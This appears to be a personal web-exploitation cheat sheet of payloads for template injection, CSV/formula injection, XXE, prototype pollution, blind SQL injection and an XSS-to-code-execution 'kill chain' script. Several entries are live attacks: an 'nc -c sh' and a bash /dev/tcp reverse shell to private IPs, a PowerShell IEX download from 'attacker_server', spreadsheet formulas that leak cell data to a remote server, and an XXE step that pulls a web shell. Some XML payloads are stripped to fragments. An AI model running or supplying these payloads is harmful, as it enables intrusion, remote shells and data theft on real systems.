Server-Side Template Injection

{{1+abcxx}}${1+abcxx}<%1+abcxx%>[abcxx]

{{7*7}}         

${7*7}     

<%= 7*7 %>

Welcome to #{process.mainModule.constructor._load(Buffer.from("Y2hpbGRfcHJvY2Vzcw==", 'base64').toString('ascii')).exec('nc -c sh 192.168.119.184 4469')}

---

A certificate is self-signed if the subject and issuer match.

---

CSV Injection

=cmd|' /C calc'!A0
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1


-2+3+cmd|'/C explorer http://www.google.com'!'A1'

And the following one which will take data from cells c1 and c20 and send it to a server/port under your control:

=HYPERLINK("http://targetIP:targetPort?leak="&C1&C20, "Click for additional information")

(Although that one would require the user to click the link!)
=WEBSERVICE(CONCATENATE("http://127.0.0.1:8080/?leak=", A5))

---

XXE

 ]>






%dtd;
]>

  &wrapper;
  Tom




&attack;



poop212022-06-12truetrue


 ]>
poop212022-06-12truetrue


 ]>



13
poop
oxloQ7JK1hmHw9FF8tai1n5TolY=
true
true
&ent;









%dtd;
]>

  &wrapper;
  Tom






PullFilehttp://192.168.119.154/cmdasp.aspx
C:/inetpub/wwwroot/dotnetnuke/cmdasp.aspx



&attack;




]>

	&lastname;
	Tom
	

---

Password Tests

• .भारत (used for websites in India)
• .网络 (the .NET equivalent in China)
• .קום (the .COM equivalent in Hebrew)
• .இந்தியா (meaning ‘Tamil’ for India, which is a language spoken in parts of India)

1234 😀!@SomeLongPasswordPast64CharactersForTestingAuthenticationLength

😀 Password1!

極Password1!

भारत网络קוםஇந்தியா

😀極भारत 网络קוםஇந்தியா

64 with everything…

1234 😀!@SomeLongPasswordPaभारत网络קוםஇந்தியாstuthenticationLength2014

---

Insufficient Input Validation

#$%😀極भारत 网络קוםஇந்தியா^&*!();@\;':"-=_+€ƒ‡†‰ŒœžŸ•™

---

JavaScript Unicode Values

JavaScript Strings
The String.fromCharCode() Method

String.charCodeAt() converts a chracter into its Unicode value.

---

PostgreSQL

# Blind time-based check if current user is a superuser
select case when (select current_setting($$is_superuser$$))=$$on$$ then pg_sleep(5) end;

---

Prototype Pollution

console.log(process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/192.168.119.207/4469 0>&1\"').toString())

ref.constructor.constructor('return util')().exec('id > pooping');

---

XSS

---

Cross-Origin Resource Sharing Test

python3 -m http.server

curl http://127.0.0.1:8000/corsTest.html

  
  


Cross Origin Resource Sharing

  
  


Cross Origin Resource Sharing

---

SQLi Examples

GET /servlet/AMUserResourcesSyncServlet?ForMasRange=1&userId=1;create+temp+table+awae+(content+text);copy+awae+from+$$c:\awae.txt$$;select+case+when(ascii(substr((select+content+from+awae),1,1))=104)+then+pg_sleep(10)+end;--+ HTTP/1.0

GET /class/mods/_standard/social/index_public.php?q=test%27)/**/or/**/((char_length((select/**/version()))))=§15§%23

GET /class/mods/_standard/social/index_public.php?q=test%27)/**/or/**/(ascii(substring((select/**/user()),15,1)))=§53§%23 

GET /class/mods/_standard/social/index_public.php?q=test%27)/**/or/**/(ascii(substring((select/**/privilege_type/**/from/**/information_schema.user_privileges/**/where/**/grantee/**/=/**/"'root'@'localhost'"/**/order/**/by/**/privilege_type/**/limit/**/1),1,1)))=§53§%23

---

Kill Chain

Set up a quick local web server to host the malicious JavaScript file.

sudo python3 -m http.server 80

If Python version returned above is 3.X

python3 -m http.server

If Python version returned above is 2.X

python2 -m SimpleHTTPServer

Then have use a XSS vulnerability on the Target web app to load a JavaScript file on the local Attacker’s box with the following contents:

// creates attachment that can then be hit on server giving reverse shell
// visit this site after vicitim opens email
// http://atmail/a/d/adminoffseclocal/false--test.php

function read_body(xhr) {
   var data;
   if (!xhr.responseType || xhr.responseType === "text") {
       data = xhr.responseText;
   } else if (xhr.responseType === "document") {
       data = xhr.responseXML;
   } else if (xhr.responseType === "json") {
       data = xhr.responseJSON;
   } else {
       data = xhr.response;
   }
   return data;
}

async function create_attachment()
{
    var uri ="/index.php/mail/composemessage/addattachment/composeID/";
    var rceString = "
Hello World
";
    var blobData = new Blob([rceString]);
    var fileData = new File([blobData], "test.php", {type: false});
    var formData = new FormData();
    formData.append("newAttachment", fileData, "test.php");

    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
       if (xhr.readyState == XMLHttpRequest.DONE) {
          console.log(read_body(xhr));
       }
    }
    xhr.open("POST", uri, true);
    xhr.send(formData);
    
    await new Promise(r => setTimeout(r, 2000));
   
    var xhr2 = new XMLHttpRequest();
    xhr2.onreadystatechange = function() {
       if (xhr2.readyState == XMLHttpRequest.DONE) {
         console.log(read_body(xhr2));
       }
    }
    uri = "/a/d/adminoffseclocal/false--test.php";
    xhr2.open("GET", uri, true);
    xhr2.send(null);
    
}
create_attachment();

---

XXE with DTD

Spin up a local webserver to host the file, wrapper.dtd, with the following contents:

Then we can use the following XXE payload:

         


%dtd;
]>

  &wrapper;
  Tom

This will concatentate the string for opening the CDATA, the file contents parsed as a single full string ( to minimize errors ),and then the CDATA closing tag.

The result will give us the full contents of the tomcat-users.xml file. Instead of tomcat-users.xml, we could enumerate directories and list contents:

---